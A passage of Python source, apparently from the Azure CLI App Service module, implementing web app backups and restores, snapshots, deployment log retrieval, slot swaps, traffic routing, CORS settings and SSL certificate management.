db_connection_string=None, db_type=None, backup_name=None, slot=None):
BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
RestoreRequest = cmd.get_models('RestoreRequest')
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
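# Illustrative _parse_frequency results:
#   _parse_frequency(cmd, '7d')   # -> (7, FrequencyUnit.day)
#   _parse_frequency(cmd, '12h')  # -> (12, FrequencyUnit.hour)
# A value that does not end in 'd' or 'h', or does not start with a non-negative integer,
# raises CLIError.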
def _get_deleted_apps_locations(cli_ctx):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
for host in app.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
client = web_client_factory(cmd.cli_ctx)
return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
'''
    Update deployment credentials. (Note: all webapps in your subscription will be impacted.)
'''
User = cmd.get_models('User')
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'begin_list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot, {"format": "WebDeploy"})
full_xml = ''
for f in content:
full_xml += f.decode()
if not xml:
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
if not isinstance(profiles, list):
profiles = [profiles]
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
cmd.cli_ctx.invocation.data['output'] = 'tsv'
return full_xml
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
SslState = cmd.get_models('SslState')
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
    url = site.enabled_host_names[0]  # picks the custom domain URL in case a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob support
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
AzureBlobStorageApplicationLogsConfig, SiteLogsConfig,
HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging:
fs_log = None
blob_log = None
level = level if application_logging != 'off' else False
level = True if level is None else level
if application_logging in ['filesystem', 'off']:
fs_log = FileSystemApplicationLogsConfig(level=level)
if application_logging in ['azureblobstorage', 'off']:
blob_log = AzureBlobStorageApplicationLogsConfig(level=level, retention_in_days=3,
sas_url=None)
application_logs = ApplicationLogsConfig(file_system=fs_log,
azure_blob_storage=blob_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
        # TODO: az blob storage log config is currently not in use; it will be implemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
import urllib3
import requests
scm_url = _get_scm_url(cmd, resource_group, name, slot)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
deployment_log_url = ''
if deployment_id:
deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
else:
deployments_url = '{}/api/deployments/'.format(scm_url)
response = requests.get(deployments_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployments_url, response.status_code, response.reason))
sorted_logs = sorted(
response.json(),
key=lambda x: x['start_time'],
reverse=True
)
if sorted_logs and sorted_logs[0]:
deployment_log_url = sorted_logs[0].get('log_url', '')
if deployment_log_url:
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployment_log_url, response.status_code, response.reason))
return response.json()
return []
def list_deployment_logs(cmd, resource_group, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group, name, slot)
deployment_log_url = '{}/api/deployments/'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
import urllib3
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
import requests
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
scm_url, response.status_code, response.reason))
return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'update_configuration', slot, site_config)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, preserve_vnet=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
    # default isPreserveVnet to 'true' when preserve_vnet is None
    isPreserveVnet = preserve_vnet if preserve_vnet is not None else 'true'
    # conversion from string to Boolean
    isPreserveVnet = bool(isPreserveVnet == 'true')
CsmSlotEntity = cmd.get_models('CsmSlotEntity')
slot_swap_entity = CsmSlotEntity(target_slot=target_slot or 'production', preserve_vnet=isPreserveVnet)
if action == 'swap':
poller = client.web_apps.begin_swap_slot(resource_group_name, webapp, slot, slot_swap_entity)
return poller
if action == 'preview':
if slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name, webapp, slot_swap_entity)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp, slot, slot_swap_entity)
return result
    # reset the pending swap on either the production slot or the named target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
RampUpRule = cmd.get_models('RampUpRule')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
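# Illustrative --distribution entry for set_traffic_routing (hypothetical names): for an app whose
# default host name is 'myapp.azurewebsites.net', the entry 'staging=25' creates a RampUpRule named
# 'staging' that reroutes 25.0% of traffic to 'myapp-staging.azurewebsites.net'.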
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'begin_list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = get_pool_manager(url)
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
                # Extra encode() and decode() for stdout encodings that do not support 'utf-8'
logger.warning(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace')
.rstrip('\n\r')) # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    with open(certificate_file, 'rb') as cert_file:
        cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
    ''' Reads the .pfx file and returns the certificate thumbprint '''
    with open(certificate_file, 'rb') as f:
        p12 = OpenSSL.crypto.load_pkcs12(f.read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def show_ssl_cert(cmd, resource_group_name, certificate_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.get(resource_group_name, certificate_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = None
if not is_valid_resource_id(key_vault):
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
key_vaults = kv_client.vaults.list_by_subscription()
for kv in key_vaults:
if key_vault == kv.name:
kv_id = kv.id
break
else:
kv_id = key_vault
if kv_id is None:
kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
'\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
'--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
logger.warning(kv_msg)
return
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
kv_subscription = kv_id_parts['subscription']
    # If in the public cloud, check if the certificate is an App Service Certificate, in the same or a different
    # subscription
kv_secret_name = None
cloud_type = cmd.cli_ctx.cloud.name
from azure.cli.core.commands.client_factory import get_subscription_id
subscription_id = get_subscription_id(cmd.cli_ctx)
if cloud_type.lower() == PUBLIC_CLOUD.lower():
if kv_subscription.lower() != subscription_id.lower():
diff_subscription_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_APPSERVICE,
subscription_id=kv_subscription)
ascs = diff_subscription_client.app_service_certificate_orders.list()
else:
ascs = client.app_service_certificate_orders.list()
kv_secret_name = None
for asc in ascs:
if asc.name == key_vault_certificate_name:
kv_secret_name = asc.certificates[key_vault_certificate_name].key_vault_secret_name
# if kv_secret_name is not populated, it is not an appservice certificate, proceed for KV certificates
if not kv_secret_name:
kv_secret_name = key_vault_certificate_name
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=kv_secret_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
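    ''' Create an App Service managed certificate for a hostname that is already bound to the app.
    Free and Shared plans are not supported, and the hostname binding is verified first. '''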
Certificate = cmd.get_models('Certificate')
hostname = hostname.lower()
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
slot_text = "Deployment slot {} in ".format(slot) if slot else ''
raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
parsed_plan_id = parse_resource_id(webapp.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
        raise CLIError('Managed Certificate is not supported on the Free and Shared tiers.')
if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
slot_text = " --slot {}".format(slot) if slot else ""
raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
"Use 'az webapp config hostname add --resource-group {2} "
"--webapp-name {1}{3} --hostname {0}' "
"to register the hostname.".format(hostname, name, resource_group_name, slot_text))
server_farm_id = webapp.server_farm_id
location = webapp.location
easy_cert_def = Certificate(location=location, canonical_name=hostname,
server_farm_id=server_farm_id, password='')
# TODO: Update manual polling to use LongRunningOperation once backend API & new SDK supports polling
try:
return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
certificate_envelope=easy_cert_def)
except Exception as ex:
poll_url = ex.response.headers['Location'] if 'Location' in ex.response.headers else None
if ex.response.status_code == 202 and poll_url:
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
poll_timeout = time.time() + 60 * 2 # 2 minute timeout
while r.status_code != 200 and time.time() < poll_timeout:
time.sleep(5)
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
if r.status_code == 200:
try:
return r.json()
except ValueError:
return r.text
logger.warning("Managed Certificate creation in progress. Please use the command "
"'az webapp config ssl show -g %s --certificate-name %s' "
" to view your certificate once it is created", resource_group_name, hostname)
return
raise CLIError(ex)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
# Cannot check if key vault is in another subscription
if subscription != key_vault_subscription:
return False
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
vault = kv_client.vaults.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'begin_create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
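    ''' Look up the certificate by thumbprint in the plan's resource group (falling back to the app's
    resource group) and set the given SSL state on every app hostname covered by that certificate. '''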
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise ResourceNotFoundError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
found_cert = None
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if not found_cert:
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if found_cert:
if len(found_cert.host_names) == 1 and not found_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
found_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(found_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise ResourceNotFoundError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
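    # e.g. a cert for ['*.contoso.com'] and web app host names ['admin.contoso.com', 'fabrikam.com']
    # yields {'admin.contoso.com'}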
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# helper class that handles runtime stacks in formats like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper:
def __init__(self, cmd, client, linux=False):
self._cmd = cmd
self._client = client
self._linux = linux
self._stacks = []
@staticmethod
def remove_delimiters(runtime):
import re
# delimiters allowed: '|', ':'
